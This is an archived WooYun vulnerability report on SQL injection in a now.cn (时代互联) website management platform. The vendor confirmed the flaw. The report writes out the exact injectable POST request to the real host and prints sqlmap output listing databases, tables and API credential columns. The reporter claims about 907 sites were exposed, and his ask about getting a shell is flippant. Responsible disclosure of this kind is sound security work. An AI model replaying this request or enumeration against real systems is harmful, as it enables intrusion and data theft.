当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0132364

漏洞标题:时代互联某管理平台SQL注入导致近千网站沦陷

相关厂商:广东时代互联科技有限公司

漏洞作者: 孤风

提交时间:2015-08-07 14:12

修复时间:2015-09-21 18:04

公开时间:2015-09-21 18:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-07: 细节已通知厂商并且等待厂商处理中
2015-08-07: 厂商已经确认,细节仅向厂商公开
2015-08-17: 细节向核心白帽子及相关领域专家公开
2015-08-27: 细节向普通白帽子公开
2015-09-06: 细节向实习白帽子公开
2015-09-21: 细节向公众公开

简要描述:

坐等忽略,顺便请教linux+php+apache后台拿shell的方法

详细说明:

注入点

POST /admin.php/website/check HTTP/1.1
Content-Length: 328
Content-Type: application/x-www-form-urlencoded
Host: a.now.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
submit=%e6%8f%90%e4%ba%a4&bind_status=3&id=*


数据库

available databases [11]:
[*] #mysql50#lost+found
[*] #mysql50#webphone.bak20150806
[*] db_now_net_cn
[*] information_schema
[*] mysql
[*] performance_schema
[*] proftpd
[*] test
[*] webphone
[*] webphone_bak
[*] webphone_center


Database: db_now_net_cn
[16 tables]
+----------------+
| APIControl |
| Albums |
| ApacheLog |
| ApacheLog_more |
| JTomcat |
| Options |
| Photos |
| Security |
| VDNS |
| VDNSI |
| VHostLog |
| VHostReferring |
| VHostServer |
| VHostServer_M |
| VHostSub |
| VHostSub_M |
+----------------+


网站信息

Database: db_now_net_cn
Table: APIControl
[13 columns]
+-------------+-------------+
| Column | Type |
+-------------+-------------+
| APIContact | varchar(30) |
| APIHost | varchar(60) |
| APILogin | varchar(30) |
| APIName | varchar(50) |
| APIPassword | varchar(33) |
| APIPort | varchar(6) |
| chrEmail | varchar(30) |
| chrTel | varchar(30) |
| cltrid | int(11) |
| dtUpdate | datetime |
| IDAPI | int(11) |
| intActive | tinyint(4) |
| intMoney | int(11) |
+-------------+-------------+


907个网站

Database: webphone_center
+--------------------+---------+
| Table | Entries |
+--------------------+---------+
| wp_admin_log | 2897 |
| wp_website | 907 |
| wp_themes | 26 |
| wp_themes_category | 11 |
| wp_admin | 1 |
+--------------------+---------+


还有个7036张表的数据库,懒得跑了

web application technology: PHP 5.5.18, Apache 2.4.10
back-end DBMS: MySQL 5.0
[22:47:36] [WARNING] missing table parameter, sqlmap will retrieve the number of
entries for all database management system databases' tables
[22:47:36] [INFO] fetching tables for database: 'webphone_bak'
[22:47:36] [INFO] the SQL query used returns 7036 entries
[22:47:37] [WARNING] reflective value(s) found and filtering out
[22:47:37] [INFO] retrieved: np_002_hr_category
[22:47:37] [INFO] retrieved: np_200_hr_category
[22:47:37] [INFO] retrieved: np_200_hr_company
[22:47:38] [INFO] retrieved: np_200_hr_job
[22:47:38] [INFO] retrieved: np_200_hr_list
[22:47:38] [INFO] retrieved: np_200_link
[22:47:39] [INFO] retrieved: np_200_nav
[22:47:39] [INFO] retrieved: np_200_page
[22:47:39] [INFO] retrieved: np_200_product
[22:47:40] [INFO] retrieved: np_200_product_category
[22:47:40] [INFO] retrieved: np_200_show
[22:47:40] [INFO] retrieved: np_2013_admin
[22:47:41] [INFO] retrieved: np_2013_admin_log
[22:47:41] [INFO] retrieved: np_2013_article

漏洞证明:

登陆一下
服务器配置

QQ图片20150806235215.png


网站信息

QQ图片20150806235256.png


权限很大啊,可直接关闭,删除

QQ图片20150806235321.png


修复方案:

23333

版权声明:转载请注明来源 孤风@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-08-07 18:02

厂商回复:

谢谢

最新状态:

暂无